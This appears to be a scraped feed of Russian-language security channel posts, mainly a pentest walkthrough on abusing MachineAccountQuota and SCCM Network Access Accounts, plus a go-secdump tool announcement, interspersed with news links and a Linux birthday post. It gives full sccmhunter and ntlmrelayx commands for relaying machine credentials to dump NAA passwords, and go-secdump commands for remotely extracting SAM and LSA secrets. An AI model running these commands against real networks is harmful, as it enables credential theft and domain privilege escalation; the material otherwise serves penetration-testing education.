Fsecurity | HH

🔗Ссылка: https://www.securitylab.ru/news/551495.php

Продолжим тему интересных вопросов с собесов, которые когда-то не вошли в подкаст :)) Думаю, все знают про MachineAccountQuota — количество компьютерных УЗ, которые могут добавлять пользователи в домен. Дефолтное значение 10. Однако, как этим злоупотреблять? В основном все вспоминают следующие основные кейсы: - NTLM Relay / иной функционал абуза , для эксплуатации которого требуется компьютерная учетная запись, например, настройка RBCD - Небезопасные ACL компьютерных учетных записей домена Впрочем, есть еще один интересный вектор, который связан с SCCM и NAA (Network Access Accounts). Это специальные аккаунты, которые предоставляются SCCMом для того, чтобы клиент мог получить доступ к Distribution Point для загрузки необходимых файлов. Учетные данные от NAA в большинстве своем пушатся абсолютно на все компьютеры, управляемые SCCMом. Если вдруг у передаваемой учетки недостаточно порезаны права, то у нас появляется вектор повышения привилегий :) Итак, кейс первый. MAQ > 0 (или мы хакнули компьютерную УЗ). В таком случае берем инструмент sccmhunter и запускаем его следующим образом:

python sccmhunter.py http -auto -u pentest -p lolkekcheb123! -d abc.ru -dc-ip 192.168.0.1

Ключ -auto автоматически создаст УЗ. Можно указать уже существующую через -cp , -cn. Однако, что если MAQ = 0? В таком случае мы можем осуществить ретрансляцию существующих кред любой машинной УЗ на SCCM и извлечь NAA-креды. Для этого берем форк , запускаем:

python3 ntlmrelayx.py -t http://sccm.sccmlab.local/ccm_system_windowsauth/request --sccm --sccm-device test12345 --sccm-fqdn sccm.sccmlab.local --sccm-sleep 10 -smb2support

-t <- Site Server, на который релеим —sccm-device <- произвольное имя, которое появится в админке SCCM. Это имя как бы добавляемого устройства —sccm-sleep <- таймаут, в течение которого ждать получения политики Далее триггерим любым удобным способом любой компьютер. ntlmrelayx сдампит для нас любезно файл naapolicy.xml с учетными данными от NAA-аккаунта, которые можно расшифровать так, как показано в блоге.

🔗Ссылка: https://www.securitylab.ru/news/551471.php

🔗Ссылка: https://habr.com/ru/companies/ru_mts/articles/835792/

🔗Ссылка: https://www.securitylab.ru/news/551459.php

🔗Ссылка: https://xakep.ru/2024/08/26/arrl-ransome/

🔗Ссылка: https://spy-soft.net/wazuh-discord-integration/

🔗Ссылка: https://xakep.ru/2024/08/26/karakurt-negotiator/

🔗Ссылка: https://www.securitylab.ru/news/551441.php

🔗Ссылка: https://www.anti-malware.ru/news/2024-08-26-111332/43998

Напоминаю про ролик 👾

🔄🖼️ go-secdump v0.3.0 Инструмент для удалённого копирования 🏠 Windows секретов (SAM, LSA) без сохранения на диск Добавлена поддержка Kerberos аутентификации

username + password username + NT Hash username + AES Key cached credentials on Linux (TGS or TGT in .ccache file)

Пример: ./go-secdump --host DC01 --user Administrator --pass Password --local --sam --lsa --dcc2 Relay: ./go-secdump --host 192.168.0.100 -n --relay Основные опции:

--host <target>
-P, --port <port>
-d, --domain <domain>
-u, --user <username>
-p, --pass <pass>
-n, --no-pass
--hash <NT Hash>
--local
-k, --kerberos
--dc-ip
--target-ip
--aes-key
--dump
--sam
--lsa
--dcc2
--relay
--relay-port <port>

💻 Home 💻 Download #soft #golang #redteam #gosecdump ✈️ // Pentest HaT 🎩

#pentest 📱 Сохраненные учетные данные веб-браузера Организации, использующие Microsoft Edge или Google Chrome для хранения учетных данных своих пользователей, уязвимы из-за злоупотребления API CryptUnprotectData (T1555.003) О том, как это можно использовать на проектах, в следующей статье. Приятного прочтения 📔

🔗Ссылка: https://habr.com/ru/companies/ruvds/articles/837998/

🔗Ссылка: https://blog.intigriti.com/hacking-tools/csrf-a-complete-guide-to-exploiting-advanced-csrf-vulnerabilities

🔗Ссылка: https://spy-soft.net/hack-wps-wi-fi-script-oneshot/

🖥 Сегодня, 25 августа, мы отмечаем день рождения LINUX! Нашу любимую ОС создал 20-летний Линус Торвальдс в 1991 году, а её название образовано из его имени и слова Unix. В своём сообщении от 25 августа Линус написал: "Я разрабатываю (бесплатную) операционную систему (просто хобби, она не будет большой и профессиональной, как GNU) для клонов 386(486) AT. Работа началась в апреле, и система уже начинает обретать форму. Буду рад любым отзывам о том, что вам нравится или не нравится в Minix, так как моя ОС во многом на неё похожа." Линус даже не предполагал, насколько далеко зайдёт его «просто хобби»: сегодня ракеты SpaceX Falcon 9 работают на Linux, а доля этой ОС на десктопах в прошлом году превысила 3%. Лайк за Linux 🥳 @linuxkalii

🛠 Взлом за пределами .com: перебор приватных TLD Добавьте TLD в свой чек-лист разведки. tldfinder — оптимизированный инструмент для обнаружения доменов верхнего уровня, связанных с ними поддоменов и связанных доменных имен. 👉 Подробнее #tools #recon

🔗Ссылка: https://habr.com/ru/articles/837804/